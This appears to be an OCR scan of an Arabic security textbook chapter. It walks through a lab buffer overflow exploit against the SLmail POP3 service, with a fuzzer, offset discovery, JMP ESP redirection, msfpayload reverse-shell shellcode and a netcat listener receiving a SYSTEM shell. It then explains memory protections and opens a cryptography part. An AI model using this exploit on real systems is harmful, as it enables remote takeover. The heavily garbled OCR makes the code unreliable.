\ Desktop Documents Downloads fuzz2.py fuzz3.py fuzzer.py 


env. lll ra fuzz2.py 
J 


|m 


#!/usr/bin/python 


import struct 
import socket 


s = socket.socket(socket.AF INET, socket.SOCK STREAM) 


buffer = 'A' * 2708 7 - - 
iic root@kali: ~ 6 ۵ © 
loppy d 3 
TR eee > : File Edit View Search Terminal Help 
print nSending evil buffer... E 
s.connect(('192.168.18.131',119)) E ELT لا80‎ 
data = s.recv(1024) 
s.send('USER username’ + '\r\n') 
data = s.recv(1024) 
s.send('PASS' + buffer + '\r\n') 
print "\nDone!." 
except: 


print "Could not connect to POP3!" 
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هيا لنعود إلى ال Debugger‏ داخل ال Win XP‏ لنرى ما حدث!.. 


لقد حدث Overflow‏ بالفعل کا ترى» وقد وصل إلى ال -EIP Register‏ 


C| File View Debug Plugins Immlib Options Window Help Jobs اعا‎ x!) 
OR TM 44۷ [۱۱ له 1 21 54 بط‎ lemtrwhcPkbzr..s ? MECILIZIIT 


41414141 


1001001111 
41414141 
ES 3 @<FFFFFFFF> 
606018 @<FFFFFFFF> 
it ۳۲ 
@<FFFFFFFF> 
7 ۳ 


۷6843 00988 00 A AO HA A AB 8 00 2C 414141 
600431008 AA 3 BO / 1 1 J 41414141 
0043 101 8 ap OA 8 3 22 7 EON 3 41414141 
904310018 73 6 3 74 68 65 20 73 se > eh 41414141 
fe 1 3 i > 41414141 


1 ١ 69 41414141 
0843 1039 6E 04 7 3 4 41414141 
0643D638 : 74 72 * 6C de b 0 1 d 41414141 
0043 00408 6 b 4 3 2 1 ; 2 ۸14۶ 41414141 
004310048 74 22 74 20 4 6 6 ar ` ZR 41414141 
984300590 7 3 6 72 7 * service ¢ 41414141 
6643D058 ag GA GE 6 24 > A158 41414141 
00۹43 69 7 74 6 2 74 20 25 star , A156 41414141 
0843 0068 5 1 1 1 2 FE ` ? ¢A16 41414141 
0643 1207۸708 6 5 oF 7 ) 7 enove 3 c 41414141 
2 2 : A 2¢ 41414141 
41414141 
41414141 8 


to renov 


هذا جيد.. هيا لننتقل إلى الخطوة الثانية 


Binary Tree Analysis 
Az LV A*2700 من بين هذه ال‎ EIP لل‎ Overwrite نريد هنا تحديد موضع ال "4۸:5 التي أحدثت‎ 
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هل تتذكر الأسئلة التي طرحناها بعد مثال ال Stack Overflow‏ ..* 

كانت ol‏ ومتى حدث ال $..Crash‏ 

سنقوم بعمل حسبة رياضية سريعة في حاولة لتخمين مكان هذه ال 4۸:۵۳ داخل ال Jl buffer‏ 

ما ابلك بدلاً من إرسال ال A's"‏ 2700“ أن نقوم بقسمة ال 2700 إلى قسمين» A's‏ 1350 و OB .1350 B's‏ حدث 
Overwritten‏ لل EIP‏ بالحرف 8 فنستنتج أن ال 0 يقع في النصف الثاني من ال .buffer‏ 3 بعدها نقوم 
بقسمة ال B's‏ 1350 هذه إلى B's‏ 1670 و C's‏ 1670. وهكذا نستمر في عملية القسمة وتغيير ال Character‏ إلى أن 


ننجح à‏ تحديد ال location‏ المرجو. 


ولکن هذه الطريقة صعبة ومُكلّفة إلى حد ما!» ما رآيك بطريقة آیسر؟ 

سنقوم باستخدام آداتان من آدوات ال Metasploit Framework‏ 

الأولى «pattern create.rb"‏ تقوم بإرسال String‏ يتم تصمیمها خصیصا ثم تحديد ال bytes‏ 4 التي قامت بعمل 
overwrite‏ لل EIP‏ وبعدها نستخدم الأداة الثانية “Pattern_offset.rb”‏ لتحديد Cex‏ هذه ال bytes‏ 4 بالضبط 


داخل هذه ال String‏ 
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NES - @ Workstation ~ n e LI FE] | (y Kali-Linux-2.0.0-vm-amd64 « | ۳ Windows XP Professional 


root@kali: ~ 


File Edit View Search Terminal 


2 2 ALOALLAL2A13AL4A15A 
4An5An6An7An 4 / ۱ Ap3Ap4A لا شا‎ 


i4Di5Di Di 


كا يظهر.. لقد طلبنا من الأداة تكوين gS string‏ 3 من 2700 حرف. 


وماذا سنفعل eA‏ ال $..String‏ 
هل Si‏ هذا السطر بالكود 2700 * buffer = 'A'‏ 
نقوم بنسخ هذه ال string‏ ووضعها هنا لتكون هی قيمة ال buffer‏ الجديدة. 
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الآن سنقوم بتنفيذ الكود مرة أخرى بعد أن نقوم بعمل restart‏ لل process‏ الخاصة SLmail JL‏ داخل الويندوز لأنه 
قد حدث crash U‏ جراء ال هجوم الاضی!. 
والآن داخل الویندوز قم بعمل attach‏ مرةً أخرى ثم Run‏ وعد إلى ال Terminal‏ لنقوم بتنفيذ الکود ابحدید» 
ما میت "fuzznew^‏ 

root@Kali:~# ./fuzznew.py 
„EIP ما حدث لل‎ salts کی‎ Debugger جيد!.. لنعود إلى ال‎ 
ستشاهک شم ااا‎ 


ASCII “13/64/66 69:12:52 P 
! 66666666 


ASCII ۳000102030 0 


66666661 


لقد حدث Overwrite‏ لل oj, EIP‏ ال Hex bytes‏ التي تم تظليلها في الصورة!. 

وماذا سنفعل SOV‏ 

سننسخ هذه ال bytes‏ ونقوم بإدخاها إلى الأداة الثانية كي تخرج لنا موضع أو ترتيب هذه ال bytes‏ داخل ال String‏ 
التي أرسلناها. fab‏ معي الشكل التالي.. حيث يُوضٌح استخدام الأداة الثانية في تحديد موضع ال bytes‏ 4 المطلوبة. 
سنقوم بإدخال مسار الأداه متبوعاً بال bytes‏ 4 وهم 38 44 69 39 

فتظهر لنا النتيجة: 


Security & Attachs 
[272] 


[*] Exact match at offset 2606 


NENE — @ Workstation + | ۷۷ | co : e H FS) (y Kali-Linux-2.0.0-vm-amd64 X | ۳ windows XP P 


File Edit View Search Terminal Tabs Help 


root@kali: - root@kali: ~ 
inf /u t-framework/tools/pattern_offset.rb 39694438 
[*] Exact match 
EM 


هيا لنعيد إرسال ال buffer‏ بعد معرفة هذه المعلومات الخطيرة © 


سنقوم بتعديل هذا السطر داخل الكود ليكون كالتالي: 


buffer = "A" * 2606 + "B" * 4 + "C" * 90 


هذا يعني أن ال LY EIP‏ آن يحدث overwrite U‏ ب B's"‏ 4“ أو 42 42 42 42 بالنظام الثنائي» ل آکملنا à‏ ال 


"C" بالحرف‎ buffer 


Security & Attachs 
[273] 


[c] File View Debug Plugins Immlib Options Window Help Jobs 
BOR «ax < || هم له !1 24 !4 بط‎ 1 emtwhePk bzir.. s + (RRA 
«| Registers (FPU) 
EAX 19 


ECX N > UN ASCII "13/64/66 
EDX 86666666 


۲5۳ 129 

BP 

ESI 0 

۲0۲ 1 
32bit ۴ 
32bit ۴ 
32bit ۴ 
32bit ۴ 


32bit 6 6 
NULL 


Address Hex dunp SE | 82۴8110 41414141 AAAA 


0218 821۴۲6129 41414141 8 
020 821۲81214 42424242 BBBB 
“O24F A128) | ۳ 717 A128 PES eee ena 

: | À 43434343 CCCC 
0218 | PITT EET 43434343 CCCC 


لقد حَدَتٌ overwrite‏ لل EIP‏ أيضاً ال ESP‏ صبحت تشير إلى بداية ال “C's”‏ بالأسفل في الجهة اليمنى 
هذا عمل رائع!.. 
هيا لننتقل إلى الخطوة الثالثة.. 


Locating Space for our Shellcode 
هذا يدفعنا‎ “C” الذي ملأناه بالحرف‎ buffer أصبحت تشبر إلى بداية ال‎ ESP لاحظنا في الشكل الماضى أن ال‎ 


& 
- 


لاستبدال حروف “C” JI‏ هذه بال Shellcode‏ الخاص بنا. 
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ولكن ال shellcode‏ الذي نحن بصدد استخدامه تصل مساحته إلى JLL 350 bytes‏ نحن بحاجة لزيادة حجم ال 
buffer‏ اا لل .shellcode‏ 


سنقوم بإجراء تعديل على السطر stabl‏ داخل الكود الذي کتبناه سابقاً.. 
buffer = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)‏ 


.shellcode المبدأية لل‎ Allocation سنقوم بتنفيذ ا هجوم مرةٌ أخرى للتاکد من نجاح عملية ال‎ «OVI, 


238 43 3 3 ۸۷3 43 13 ۷3 13 43 ۲ 3 43 3 ۱0 0060 22001126 +3 
622DA138 3 43 43/43 43 43 43/43 43 43 ۷3 1۷3 43 13 4 : 822 08713 43434343 
82208118 5 3 43 E $ + E 2 E 0 : ` 622DA134 43434343 
2298 3 43 3 43 43 43/43 43 43 43 3 43 6 : HHH 82208138 43434343 
0220۸168 1 i 1 1 1 ۱ 1 1 1 1 E : k HH 02208136 43434343 
82208178 1 3 43 1 3 43 43/43 4 3 43/53 ١ 1 - 1 > 122001110 43434343 
02208188 13 43 43 43/43 43 43 h3|53 4: 3 وبا‎ 43 43 3 | ۸ 822DR1h5h 43434343 
02208198 43 43 ^: 3 43 43 43/43 53 53 M 3 43 ^: ١ 82208114۷8 43434343 
622DA1A8 3 43 43/43 43 43 43/43 43 43 43/43 43 43 43İCCCCCCCCCCCCCCC 2201116 13535353 
622DA1B8 i 1 1 : g 1 $ 3 ¢ 31 1220011500 43434343 
0220818 ۷3 43 43 43/43 43 43 43/43 43 43 3 43 43 5 " HH 82208151 43434343 
622DA1D8 3 5 3 43 M 3 N3 43 43/43 43 43 ۱0 eee 02201158 3 
02208188 43 43 ۲ 3 43 43 ۷۵ ۲ 3 43/43 43 43 h3|CCCCCCCCCCCCC 822081506 43434343 
822DR1F8 7 $ $ d E 3 ۱ 6 3 ` E 1 E ~ ۲ - 2208166 43434343 
022082608 43 43 ۲ 3 43 43 43/43 43 43 h3|53 43 43 h3|CCCCCC C 82208161 43434343 
02208218 ۷۶ 43 ۷ 3 53 h: f 007 M Coc 000 02201168 383 
022008228 143 43 43 43/43 43 43 43/43 43 43 43/43 43 43 6 ` : 122011166 43434343 
922082398 3 43 43/43 43 43 43/43 4: 3/43 43 43 43 HHHH ۰ : 82208179 43434343 
02208218 ۷3 43 4S 3 43 43 43/43 43 43 M 3 43 0 cee 82208171 43434343 
228 3 ^ 3 %3 43 43/43 43 43 43/43 43 43 3 00 00 92200178 43434343 
822082618 1 < 3 3 1 3 3 4S 1 i 1 i E - 3/CCCC -eeeee 622DA17C 43434343 
02208278 | 4: 3 - 3 3 5t 3 4 E 3 E E B . 82208189 43434343 
228 3 y 3 43 ۶ 3 53 43 4 3 43 N HHHH 022001819 53 
622DA298 3 4 1 í HM NE NE 4 1 sicec HMHHHMM 0220188 83 
82208288 5: 3 E 82208186 43434343 
2298 3 4 3 43 43 43/43 43 43 کب 43 43 وبا وبا‎ 5 622DA196 43434343 
622DA2C8 3 yi 3 43 43 43/43 4S 43 Mi 1 CCC HHHH 2201811919 3 
0 02206198 43434343 


لقد نجحنا!!.. 


كا ترى تحت خانة ال «Address‏ تم تظليل ال address‏ الخاص ببداية ال 556110006 وهو الذي تشير إليه ال -ESP‏ 


ولكن لاحظ أن ال address‏ الذي تُشير «JJ‏ ال ESP‏ قد 65 في المحاولة الثانية!. 
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وماذا نستفيد من کون أن ال ESP‏ تشر إلى هذا ال Address‏ .€ 
نستفيد أنه لو استطعنا عمل redirection‏ لل Execution flow‏ أثناء حدوث ال crash‏ بحيث Jump NV:‏ إلى ال 


“Address of ESP Register”‏ سنکون liy‏ حققنا هدفنا. 


وما هو هدفنا؟ 

بها أن ال ESP‏ تشير إلى موضع ال cshellcode‏ فهذا يعني أنه سيتم تنفیذ ال shellcode‏ وهو عبارة عن Reverse‏ 
.shell‏ 

إذاً.. نحن OYI‏ بحاجة للبحث عن Instruction‏ من نوع IMP ESP‏ كي جبر ال CPU‏ بالقفز إلى ال ESP‏ أثناء 


حدوث ال .crash‏ 


ولاذا لا تعطیه نحن هذا ال Address of ESP‏ لتوفير عناء البحث عن هذه ال instruction‏ داخل ال $..Memory‏ 
كا رأينا ol‏ هذا ال Address‏ يتم تغييره في كل مرة يحدث فيها oid crash‏ ال «process‏ وبالتالي sa a‏ معر 43 
عنوانه!» وعوضاً عن ذلك» سنبحث عن هذه ال instruction‏ التي تقوم بالقفز إلى ال ESP‏ كنوع من التحايل على 
هذه المشكلة. 


هذا ممتاز.. هيا لننتقل إلى الخطوة الرابعة.. 
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Redirecting the Execution Flow 
التالية كي يتم تنفيذها.. أليس كذلك؟‎ instruction وهي المسؤوله عن الانتقال إلى ال‎ EIP نمتلك ال‎ OYI نحن‎ 


کا آننا نعلم ال instruction‏ التالية التي نود الانتقال إليها.. وهي .Jmp ESP‏ ولدينا ال shellcode‏ الذي وضعناه في 
مكانٍ ما في ال memory‏ 

یتبقی UJ‏ الآن اجاد هذه ال instruction‏ التي تنتمي لاي Executable‏ غير حمي بتقنية ال DEP‏ و ال ASLR‏ كي 
نستخدمة هذه الهمة الخطيرة © 

هل تذكر هذا ال DEP‏ وال $..ASLR‏ 

سنستخدم oi‏ الهمة Script‏ پسمی mona.py‏ وهو أحد ال Scripts‏ الخاصة مذا ال Debugger‏ الرائع. 

هذا ال Script‏ سنطلب منه أن يبحث UJ‏ داخل ال memory‏ عن أي module‏ أو executable‏ تتوفر به الخصاتص 


التي تُريدهاء وهي أن يكون هذا الملف غير محمي کم ذكرنا سابقاًء ثم بعدا نقوم بالبحث داخل هذا ال module‏ عن ال 


.Jmp ESP وهى‎ dp , ZJ! Instruction 


مايل النتائج التى أخرجها لنا ..mona.py‏ 


لیس UL‏ بالعنی 3,4« بل هو .Application Library‏ هذا ال Y DLL‏ يتعرض إلى ال Rebase‏ في كل عملية 


001 أيضاً غير محمی بتقنیات ال SafeSEH‏ أو ال «DEP‏ أو ال .ASLR‏ 
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هذا اختيار مثالى! !.. 
والآن سنبحث بداخله عن Jmp ESP‏ ولكن لا يُمكننا كتابتها هكذا في خانة البحث!.. نحن بحاجة إلى ال opcode‏ 


odd Ju‏ ال instruction‏ وهو esi FF E4‏ بالبحث بكتابة الأمر کا هو موضح بالشكل التالي: 


DDpDnrii 


rint ascii 4 ONLY) LSLMFC.DLL 
PAGE RERDONLV) TSLMFC. OLL] ASLR: F 


A: 00: 00.5728000 


نقوم بالنقر المزدوج على هذا ال (ITI address‏ باللون الأبيض لتظهر لنا ال instruction‏ بشكل واضح كايلي: 


548358 FEH E 


5۴ 1۱83591 0048 SF ADD BYTE PTR DS:[EAX+5F 


الحصلة حتی الان.. 
نحن بحاجة لتوجیه ال Execution flow‏ أثناء حدوث ال crash‏ وهو feel‏ في ال EIP‏ التى استطعنا عمل 
overwrite‏ ها.. إلى هذا ال address‏ الذي يقع داخل ال slmfc.dll o DLL‏ والذي یقوم بعمل Jump‏ إلى ال 


ESP‏ والتى بدورها تُشير إلى ال shellcode‏ الخاص بنا!. 
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هذا مٌدهش!1.. 


هيا بنا لنتتقل إلى الخطوة الأخيرة.. 


Getting the Shell 
الذي ثريده.‎ shellcode JL 65۳ استبدال ال‎ UJ الآن» وبعد أن حصلنا على كل ما تُريد» بقى‎ 


تعال معي لنشاهد الشكل النهائي للكود الذي سنقوم بتنفيذه.. 
#!/usr/bin/python‏ 


import socket 
و‎ = socket. socket (SOC EEE AK INET, socket. SOCK SEREAM) 


shellcode = 
("\xbb\xdc\x0e\x23\xlc\xd9\xed\xd9\x74\x24\xf4\x5£\x33\xc9" + 
"\ xb1l\x4£\x31\x5£\x14\x83\xef\xfc\x03\x5f£\x10\x3e\xfb\xdfi" + 
"\xf4\x37\x04\x20\x05\x27\x8c\xc5\x34\x75\xea\x8e\x65\x49" + 
"\x78\xc2\x85\x22\x2c\xf£f7\xle\x46\xf£9\x£8\x97\xec\xd£\x37" + 
"\x27\xcl\xdf\x94\xeb\x40\x9c\xe6\x3f\xa2\x9d\x28\x32\xa3" + 
"\xda\x55\xbd\xf1\xb3\x12\x6c\xe5\xb0\x67\xad\x04\x17\xec" + 
"\x8d\x7e\x12\x33\x79\x34\x1d\x64\xd2\x43\x55\x9c\x58\x0b" + 
۲۲۱6 4 6۱26 901۱268 01۱264 8 ۱2202 ۱204 ۱2602 ۱26102 ۱264 8 ۱2667 ۱2662 ۱26۴3 ۱2601۱2609" + 
"\x52\x5£\x8c\xd5\x5e\x9e\xc8\xd2\x80\xd5\x22\x21\x3c\xed" + 
"\xf0\x5b\x9a\x78\xe5\xfc\x69\xda\xcd\xfd\xbe\xbc\x86\xf£2" + 
"\x0b\xcb\xcl\x16\x8d\x18\x7a\x22\x06\x9f\xad\xa2\x5c\xbb" + 
"\x69\xee\x07\xa2\x28\x4a\xe9\xdb\x2b\x32\x56\x79\x27\xd1" + 
"\x83\xfb\x6a\xbe\x60\x31\x95\x3e\xef\x42\xe6o\x0c\xb0\xf£8" + 
"\x60\x3d\x39\x26\x76\x42\x10\x9e\xe8\xbd\x9b\xde\x21\x7a" + 
"\xcf\x8e\x59\xab\x70\x45\x9a\x54\xa5\xc9\xca\xfa\x16\xa9" + 
"\xba\xba\xc6\x41\xd1\x34\x38\x71\xda\x9e\x4£\xb6\x4d\x2b" + 
"\x50\x%38\x8a\x43\x52\x38\x93\x28\xdb\xde\xf9\x5e\x8a\x49" + 
"\x96\xc7\xX97\x01\x07\x07\x02\x81\xa4\x9a\xc9\x51\xa2\x86" + 
"\x45\x06\xe3\x79\x9c\xc2\x19\x23\x36\xf£0\xe3\xb5\x71\xb0O" + 
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"\x3£\x06\x7£\x39\xcd\x32\x5b\x29\x0b\xba\xe7\x1ld\xc3\xed" 
xcb\xa5\x47\x70\xa5\x7£\x3b\xda\x21\xf9\x77\xdd\x37" 
"\x06\x52\xab\xd7\xb7\x0b\xea\xe8\x78\xdc\xfa\x91\x64\x7c" 


WN dol 


"\x04\x48\x2d\x8c\x4£\xd0\x04\x05\x16\x81\x14\x48\xa9\x7c" 
"\x5a\x75\x2a\x74\x23\x82\x32\xfd\x26\xce\xf4\xee\x5a\x5£" 
"\x91\x10\xc8\x60\xb0") 
20122612 = WAY < 2606 b. YW وا‎ Noo) SASF 1 IO + 8 4 512111 26 
ES 

DEME SEMANAS OEE وی‎ s Y 

S 5602268 (192 5 1685 LOLS, LLOJ) 

data = s.recv(1024) 

s.send('USER username' +'\r\n') 

data = s.recv(1024) 

Seine AS SU | 5122 ی‎ Ye \i 

s.close() 


OEE WNJBISIMS S ^ 


except 


nor Connect ro EOE‏ ان عاد عدم 


یظهر بعض التعدیلات على السطر الخاص بال ..buffer‏ 


Buffer = "A" * 2606 + "\x8f£\x35\x4a\x5£" + "\x90" * 8 + shellcode 


لقد استبدلنا ال "AB's"‏ التى قامت بعمل overwrite‏ لل EIP‏ بال address‏ الخاص Jmp ESP JL‏ الذي عثرنا عليه 


داخل ال .slmfc.dll‏ 


A^ $2 z 
“No Operation" | zx; مرات» وهو "۱:90" حيث‎ GIS معين مکرر‎ opcode بإضافة‎ Ls آیضا‎ 


وما هذا ال $..NOP‏ 


(Do nothing, and execute the next instruction) .. die تعني‎ instruction ll 
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وعندما ینتقل ال EIP‏ إلى ال instruction‏ التالية يجدها مثلها.. وهكذا إلى أن يصل إلى بداية ال .shellcode‏ 


ولكن BU‏ قمنا بإضافتها بأي حال؟. 

لماذا لم نضع ال shellcode‏ $205 بعد توجيه ال EIP‏ إلى o>‏ تُشير ال ESP‏ ..؟ 

كي نتجنب ضياع أي عدد من ال bytes‏ الواقعة في بداية ال shellcode‏ جرّاء عملية ال Jump‏ فنضع له هذه ال 
5 كي يقع ال Pointer‏ في أي منها ويكمل السير إلى أن يصل إلى ال .shellcode‏ 


وأخبرا هذا ال shellcode‏ حصلنا عليه باستخدام أحد موديولات ال Metasploit‏ وهو ansfpayload‏ ويحتاج ls‏ 
بعض العلومات الأساسية کال Local IP‏ الخاص بنا وال «Local Port‏ 


ولغة البريحة Gà‏ إذا كانت C‏ أو Python‏ 


root@kali:~# msfpayload windows/shell reverse tcp LHOST-192.168.18.128 
LPORT-443 C 


تبدو الامور تمتازة إلى Tow‏ 
بقی لنا أن ننتظر هذا ال reverse shell‏ الذي مساق لنا من ال Win XP‏ هذا coy‏ آننا يجب أن نکون في وضع ال 


8 كى نتمکن من استقبال هذا الاتصال العکسی. 
تقوم LJ‏ أداة Netcat‏ بهذه «xa gll‏ نقوم بفتح Tab‏ جدید داخل ال Terminal‏ وكتابة هذا الأمر: 


TOO Clea Ie ne mliyo 3 
root@kali:~# 
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a‏ نبدأ ال Attack‏ من جديد.. 


root@kali:~# ./fuzznew.py 
Sending buffer... 
Done. 


والآن نعود إلى ال Tab‏ الخاص بأداة Netcat‏ لننتظر الإتصال القادم من ال Victim‏ 


root@kali:~# nc -nlvp 443 
listening on [any] 443 : 
0۵۲0 ات‎ EO [192.168 die o db] كرت ضع‎ (UINKEN © WIN) am [| 35912: وم‎ . 18 817 AS 
Microsoft Windows XP SP3 

Copyright (c) Microsoft Corporation. All rights reserved. 
C:\Program Files\SLmail\System>whoami 

whoami 

nt authority\system 


ها نحن ذا.. حصلنا de‏ آعل الصلاحیات!.. وهی System Privileges‏ 


سنکتفی مبذا القدر.. 


سننتقل للحديث عن ال Protection Mechanisms‏ المستخدمة لحاية ال Operating Systems‏ 


وال memory‏ من عمليات التلاعب هذه. 
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Protection Mechanisms 


سنتحدث بشكل pat‏ عن عدة تقنیات أمنية تستخدمها أنظمة التشغيل المختلفة. 
یُمکننا تلخيص عملية الاختراق الحادث في ثلاثة خطوات رئيسية: 
9 الأول هي حدوث خلل في ال memory‏ المخصصة لهذا البرنامج أو ال application‏ 
" والثانية هي محاولة السيطرة على ال flow‏ الطبيعي للبرنامج Ob‏ نغيّر مسار هذا ال flow‏ إلى شيء آخر. 


.memory مكانٍ ما داخل ال‎ à الذي قمنا بزرعه‎ shellcode لل‎ execution والثالثة هى عملية ال‎ m 


وبمعرفة التهديدات التي يتعرض ها نظام التشغيل يمكننا تخيل طرق [LI‏ المناسبة هذه الثغرات. 
نبداً باول طريقة: 


Nonexecutable Stack 
à الخاص بك‎ Shellcode فإذا تمكنت من وضع ال‎ .Buffer Overflow ال‎ ol e هذا إجراء واضح و مباشر‎ 
..فلن تتمكن من تنفيذه!» وبالتالي لن يكون له أهمية.‎ memory أي مكان تريده في ال‎ 


This feature enabled by default in most Linux distributions, OpenBSD, Mac OS X, Solaris, and 
Windows. 


d‏ تكنيك باسم «ret2libc (returning into libc)‏ وهی library‏ تحري بعض ال functions‏ كال ) ( printf‏ و ال 
«exit( )‏ ..هذه ال functions‏ تعتبر 0 بمعنى أن أي برنامج يستخدم هذه ال function‏ سيتمكن من توجيه 


مسار ال execution‏ إلى مكان هذه ال function‏ داخل ال libe‏ 
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فوجود ثغرة في البرنامج ستمکننا من توجیه ال execution‏ إلى آي function‏ تقع à‏ هذه ال lib‏ تطور هذا الأمر 


ليشمل بعض التكنيكات الأخرى مثل: 
ret2plt, ret2strcpy, ret2gets, ret2syscall, ret2data, ret2text,‏ 
ret2code, ret2dl-resolve, and chained ret2code.‏ 


W^X Memory 
هذه الخاصية باختصار تعني الآتي:‎ 
Making writable memory non-executable, and executable memory non-writable. 
. vulnerable program في حالة و جود‎ shellcode لل‎ inject وبتطبيق هذه الخاصية سيكون من الصعب عمل‎ 


إذا تم تطبيق هذه ال mechanism‏ وحدها فلن تتمكن من منع كل التكنيكات التى عرضناها فوق» يبدو lel‏ ستفلح 
فقط مع ثلاثة منهم. وهم .ret2strepy, ret2gets, and ret2data‏ فینبغی تدعيمها بتقنيات أخرى.. 
لكنها فكرة ممتازة» استفادت منها Microsoft‏ عندما طورت ال DEP (Data Execution Prevention)‏ في إصدار 


Win XP 2‏ حيث تعتمد فكرته على هذه النظرية. 


Canaries (Stack Protection) 
JÉ هذه الخاصية تأخذ إسم طائر الكناري» ولتقريب وظيفة هذه الخاصية أكثر سنتكلم عن وظيفة هذا الطائر عند‎ 


مناجم الذهب. يحمل العمال معهم هذا الطائر وهم في طريقهم للحفر» فکل) تعمقوا أكثر.. 
كلما قل الأكسجين c SÍ‏ وهكذا إلى أن ينعدم.. 
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فائدة هذا الطائر هي أله sh‏ خساسية منهم للأكسجين.. وبالتالي سيتعرض للاختناق مبكراً مُنذراً بذلك خطورة 
استكمال التعمق بالداخل.. 

وهذا بالضبط ما نرید تطبیقه کنوع من آنواع ال protection‏ لل -Stack‏ 

فهي عبارة عن bitS values‏ 32 يتم وضعها في oU‏ ما بين ال buffers‏ والبيانات الحساسة التي نود حمايتهاء d‏ 
حالة حدوث ..buffer overflow‏ ستتعرض هذه ال Canaries‏ لهذا ال il overflow‏ مُنذرةً بذلك البرنامج 


بحدوث خلل قبل وصول ال overflow‏ هذه البيانات. 


مايل شكل يوضح ال Stack‏ مع وجود ال canary‏ بين ال buffers‏ و ال .variables‏ 


1 Lower addresses 

var2 4 bytes 
buf 80 bytes 
varl 4 bytes 
saved ebp 4 bytes 
canary 4 bytes 
return address 4 bytes 
arg 4 bytes 


| Higher addresses 


نختم هذا الباب بالشکل التالي» والذي يوضح مفهوم تحقيق الحاية على عدة طبقات وباستخدام عدة ae) wii‏ 


“Using different methods in multiple layers of security” 


وهذا ما يُطلّق عليه “Defense in Depth”‏ 
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ee ""* 


X Firewall w^ 
Access blocked at the firewall w 


X 5 ais 
Access blocked at the IPS ap 


Intruder attempts access, but blocked by AV or whitelisting w 


X AV or whitelisting 


DLP X cem 
Intruder reaches data, but denied while exfiltrating 4 
53 > 
Intruder exfiltrates data, but denied when reading Él 
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الشكل يوضح محاولات اختراق ciae‏ يتم إحباطها بعدة آليات: 
" ففى الشكل الأول تم إحباط المحاولة عن طريق ال “Firewall”‏ بسبب ال Rules‏ التى تتصدى لأغلب 
TX‏ 


" في الشكل الثاني استطاع الشاب تجاوز ال «FW‏ لكن آمسك به ال “TPS”‏ 


۶ في الحالة الثالثة استطاع تجاوزهم ليصل إلى الجهاز ON c! ge A‏ تم الإمساك به بواسطة ال "Anti Virus"‏ 


= في الشكل الرابع يظهر أنه استطاع نسخ ملف ومحاول نقله!» لكن لم یفلح بسَیّب تَصَديٍ ال "DLP"‏ 
(Data Leakage Preventions)‏ 
" وني الشكل الأخير استطاع po‏ 3$ ال Data‏ ولكن Ge‏ قام بفتحها فوجی iat o‏ بواسطة ال 


“Digital Rights Management" 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلوماءته‎ 
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Part IV 
Cryptography 
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Introduction 


$ Z f M aoe a A^ 

آتذکر قصة حَدنت في عهد az‏ حكام الخلافة الأمَوية في الان 

2 ^ ۰ ^£ 5 A ۳ z : y . 

غزوة» ۸ یم فيهم قط!. واتسعت دولة المسلمين في الأندلس يشكل كبير في عهده لكثرة الداین والمخُصون التي كان 


e pg‏ باستردادها أو فتجها وَوَضعِها تحت قيادته. 


GEN NSB الكبير» وهمته العالية» وذکائه‎ a S y ably صِعَره‎ X عامر (الحاجب المنصور).. عرف‎ ul بن‎ a 
قصر الخلافة بتولیهعلَة مَناصِب بشّكل تدريجي.. إلى أن‎ ah بدأت رحلته‎ ed ليدرس علوم الأدب والحديث في قرطبة»‎ 
حينها وكيل فشام.. إبن الخليفة "المستنصر بالله".‎ OUS y تَمّ تسليمه قيادة الشرطة»‎ 

وبعد وفاة الخليفة كان هشام لايزال صغيراً!ء A Lo‏ بن أبي عامر مُقاليد الأمور لين يُلوغ الخليفة الصغير السّن 
الناسب لتولي السلطه. SF‏ بدأ التاريخ Jed‏ إنجازاته العسكرية غير المسبوقة!. 

آن تخوض في od‏ الانجازات قَهذا ليس مَكانهاء ولکن سأروي لکم قصة سريعة: 

في يوم من الأيام.. ELA‏ ا لحاجب النصور في إحدى غزواته بمدينة "سا" وهو الثغر الذى باه على خدود الدوّل 
النصرانية في كال eu AI‏ وحطرّت له خاطرّة على مدى ذکائه وتوقعاته» فاستدعى أحد فرسانه في ليلة شديدة 
ca ll‏ كثيرة الامطار» وکلفه أن يخرج الى مكان من الَضِيق قرب هذه المدينة» وقال له: 


"من مرّ بك في هذه Gb. ALU‏ به إلى کائناً من کان" 
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فاستغرب الفارس وبدأ يتسائل في نفسه.. ومن جرج في مثل هذه الليلة؟ البرد القارص ولمطر الغزير!. 
i‏ الفارس الأمرء وبقي يرصّد الطريق يرجف من البرد تحت وابل المطرء وإذا بشيخ كبير من النصارى الذين كانوا 
يعيشون في هذه المدينة من آهل الذمة» على دابة ومعه if‏ الحطب من فأس de‏ 

A. WIS‏ أن استوقفه: إلى أين أا العجوز في مثل هذا الوقت ؟ وماذا تفعل ؟ 


فال العجوز: أريد خط لاهل Mia‏ 


ر کا fel go lull‏ سبرة SS‏ آمر احاجب النصور.. فقد OUS‏ مروا سحزمه وشا 
فأوقَفَ العجوز قائلاً : LY‏ أن تأي مَعي إلى الأمير» 


& 0 
قال: وماذا يريد الأمير مني؟» دعني أتابع سيري. 


إلا أن الفارس آجبره على المثول بين يدي الحاجب المنصور.. فأمَرَ بتفتيشه وتحري ملابسه فا عثروا على شيء مُریب!» 
pb‏ المنصور بتحري بردعة oll‏ 

وبعد تحريها وجدوا فيها خطابا من بعض النصارى القاطنین في جهة من هذه المدينة يدلون العدو على ثغرة من ثغرات 
المسلمين كاتبين: 

"أن اهجموا على مدينة dle‏ وعلی جيش المنصور من الجهة الفلانية ونحن نساعدكم على تلك الباغتة". 
تمكنت الدهشة من الحارس» واستفهم من المنصور!ء وكيف عرفت أن هذا الجاسوس سیمر في تلك الليلة ؟ 


فقال: وهل تنتهز العيون إلا أمثاها؟ 
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انتهت القصة يا صديقي! 

والآن تعال نُجري بعض التحليلات: 

هذا الشيخ الذي تم SUMI‏ به.. 

قام باستغلال هذه الظروف الُْناخية القاسية لتكون شيء أشبه بال “Secure Tunnel”‏ الذي تم إنشاؤه بين الجهتين 
التي يصل بينهم. ثم اصطحب معه آلة الحطب ole‏ بعض أساليب التعمية “Obscurity”‏ كي يدفع الفارس آلا 
يُركز على ماتخفيه» وأيضاً قام بإخفاء الرسالة بشكل احتراني aaa)‏ عملية العثور عليها. 


يالهُ من مُراوغ.. لكن بقيت نقطة ضعف خطيرة وهي أن الرسالة نفسها غير مُشفرة!. 


peg Ls Hs 2,‏ ی ae ace wf 2 r‏ 5 
فكر معي قليلا.. تخيل أننا نعيش في القرون الوسطی. ونريد أن نحقق عملية تواصل سرية. 


